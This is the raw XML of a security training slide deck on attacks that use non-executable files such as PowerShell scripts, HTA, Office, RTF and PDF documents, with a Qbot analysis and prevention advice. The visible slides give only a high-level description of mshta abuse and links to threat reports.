                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://vulnerablelife.wordpress.com/2020/03/05/powershell-for-red-teams/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457188" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1600"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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagen 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A39184B-2B34-5F3C-4015-37A87243157B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4729532" y="2150532"/>
            <a:ext cx="3639746" cy="1067905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="824522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s-ES" dirty="0"/>
              <a:t>Powershell</a:t>
            </a:r>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800" dirty="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Monnappa's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> blog we can find examples of attacks where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> is used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://cysinfo.com/cyber-attack-targeting-indian-navys-submarine-warship-manufacturer/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://cysinfo.com/uri-terror-attack-spear-phishing-emails-targeting-indian-embassies-and-indian-mea/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457188" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="2400"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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagen 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E70F0CB-9F52-2F18-28C6-7EFD2ECFA07D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3880878" y="2571750"/>
            <a:ext cx="1162110" cy="1759040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1534595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715A4D2-C1D0-CCA3-7A45-77140CCD9432}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>HTA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Documents</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A930B5D-E8DF-27F5-B8F5-8E38D7F87E53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>In 2003 Microsoft introduced HTA, (HTML Applications). It basically consists of allowing developers to create web applications for Microsoft Internet Explorer but without enforcing the strict security model and user interface of web browsers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>The programs are based on html code and one or more scripting languages VBScript or JScript. A wonder for MW developers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>The usual attack is implemented in two stages, in a first stage, the attacker manages to send a Trojan to the victim by making one of the ActiveX components or another method. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>In a second stage, the Trojan loads the system application mshta.exe with scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>hta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> from a malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Although the idea was scrapped and removed from later versions of Internet Explorer , the engine that does the actual work mshta.exe is still present in the system to support legacy applications.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Marcador de número de diapositiva 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0444A1D-358F-8691-2724-E454E6CAF849}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{EF611178-6C3A-F247-8731-699DBDA96700}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3324912474"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="WatchGuard_2016">
  <a:themeElements>
    <a:clrScheme name="WatchGuard Colors">
      <a:dk1>
        <a:srgbClr val="333333"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="FF3333"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="B32317"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="26BCD7"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="00467F"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="F89828"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="26BCD7"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="8DC641"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="FF3333"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="333333"/>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_WatchGuard_Template_010216_v3" id="{DA90B800-13A8-B24A-B32A-F082A441A350}" vid="{F7DFEEAE-2B24-1949-AD24-7F4924AC05D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B4005D9E3367841B8133DC16E2CA0C5" ma:contentTypeVersion="8" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="09b02c7bb5c11e94011aae484563c38d">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="2fc784a7-eac2-4729-8291-eda7c6e43d70" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="6c2ec72030b46cd7db5e4ea8f0b91378" ns2:_="">
    <xsd:import namespace="2fc784a7-eac2-4729-8291-eda7c6e43d70"/>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fc784a7-eac2-4729-8291-eda7c6e43d7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2700A43-2957-4B4F-B9B2-614592CDFD03}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{BD5DA11A-3F94-4546-8574-85B8F701914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fc784a7-eac2-4729-8291-eda7c6e43d7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90DD382-103D-4FD4-A0D2-A5E0F0380794}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="2fc784a7-eac2-4729-8291-eda7c6e43d70"/>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"/>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>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11934</TotalTime>
  <Words>5700</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>529</Paragraphs>
  <Slides>33</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-apple-system</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Söhne</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>WatchGuard_2016</vt:lpstr>
      <vt:lpstr>Understanding advanced attacks that involve non-PE files</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Introduction to malicious documents</vt:lpstr>
      <vt:lpstr>Powershell</vt:lpstr>
      <vt:lpstr>Powershell</vt:lpstr>
      <vt:lpstr>Powershell</vt:lpstr>
      <vt:lpstr>Powershell</vt:lpstr>
      <vt:lpstr>HTA Documents</vt:lpstr>
      <vt:lpstr>HTA Documents</vt:lpstr>
      <vt:lpstr>HTA Documents</vt:lpstr>
      <vt:lpstr>HTA Documents</vt:lpstr>
      <vt:lpstr>Microsoft Office. </vt:lpstr>
      <vt:lpstr>Microsoft Office. </vt:lpstr>
      <vt:lpstr>Microsoft Office. </vt:lpstr>
      <vt:lpstr>Microsoft Office.</vt:lpstr>
      <vt:lpstr>MSG Files.</vt:lpstr>
      <vt:lpstr>RTF files.</vt:lpstr>
      <vt:lpstr>RTF files.</vt:lpstr>
      <vt:lpstr>PDF</vt:lpstr>
      <vt:lpstr>PDF Structure</vt:lpstr>
      <vt:lpstr>PDF</vt:lpstr>
      <vt:lpstr>PDF</vt:lpstr>
      <vt:lpstr>PDF</vt:lpstr>
      <vt:lpstr>Qbot</vt:lpstr>
      <vt:lpstr>Qbot</vt:lpstr>
      <vt:lpstr>Technical Analysis of Qbot</vt:lpstr>
      <vt:lpstr>Technical Analysis</vt:lpstr>
      <vt:lpstr>Method of infection and propagation</vt:lpstr>
      <vt:lpstr>Recomendation</vt:lpstr>
      <vt:lpstr>Prevention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Authpoint Roadmap 2020</dc:title>
  <dc:creator>Alexandre Cagnoni</dc:creator>
  <cp:lastModifiedBy>Ashu Sharma</cp:lastModifiedBy>
  <cp:revision>368</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-11T15:31:22Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-02T23:47:17Z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0x0101004B4005D9E3367841B8133DC16E2CA0C5</vt:lpwstr>
  </property>
</Properties>
</file>